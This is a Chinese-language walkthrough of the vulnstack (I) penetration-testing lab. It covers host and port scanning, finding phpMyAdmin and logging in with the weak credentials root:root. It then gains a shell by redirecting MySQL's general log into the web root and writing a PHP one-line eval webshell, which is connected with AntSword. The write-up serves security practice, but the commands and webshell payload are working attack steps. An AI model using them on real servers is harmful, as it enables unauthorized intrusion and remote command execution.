欢迎您访问 最编程 本站为您分享编程语言代码,编程技术文章!
您现在的位置是: 首页

[红太阳安全] vulnstack (I) - 范围渗透

最编程 2024-10-19 11:04:03
...

明确目标

目标跟我们处于同一个网段

信息收集

先查一下我们自己的IP,用 ifconfig 查看攻击机的IP为192.168.64.131在这里插入图片描述

探测一下跟我们同一网段下的主机有哪些,用Kali自带的arp扫描器扫描同一网段下的主机,发现了同一网段下的不同IP192.168.64.134,判断它就是要渗透的主机。

arp-scan -l  扫描网段所有主机
arp-scan -I eth0 -l  扫描指定网段所有IP

在这里插入图片描述

扫到IP之后接下来扫描端口,发现它开启了803306端口

nmap -T4 -p- 192.168.64.134

在这里插入图片描述

访问一下80端口,发现是phpStudy探针界面,在其中发现了它的操作系统是Windows,服务器是Apache
在这里插入图片描述

dirsearch扫一下看看能发现什么,成功扫出来了phpmyadmin界面
在这里插入图片描述

访问一下看看,发现是一个登陆界面
在这里插入图片描述

用弱口令试试,刚开始试了admin:123456提示错误,又用root试了一下成功登录进去

账号:root
密码:root

在这里插入图片描述

phpadmin后台getshell

  1. 开启日志
set global general_log='on';

在这里插入图片描述

  1. 改变日志存储位置
set global general_log_file ="c:/phpStudy/www/she.php";

在这里插入图片描述

  1. 写入一句话木马
select '<?php @eval($_POST[cmd]);?>';

在这里插入图片描述

  1. 用蚁剑连接,成功getshell

在这里插入图片描述

推荐阅读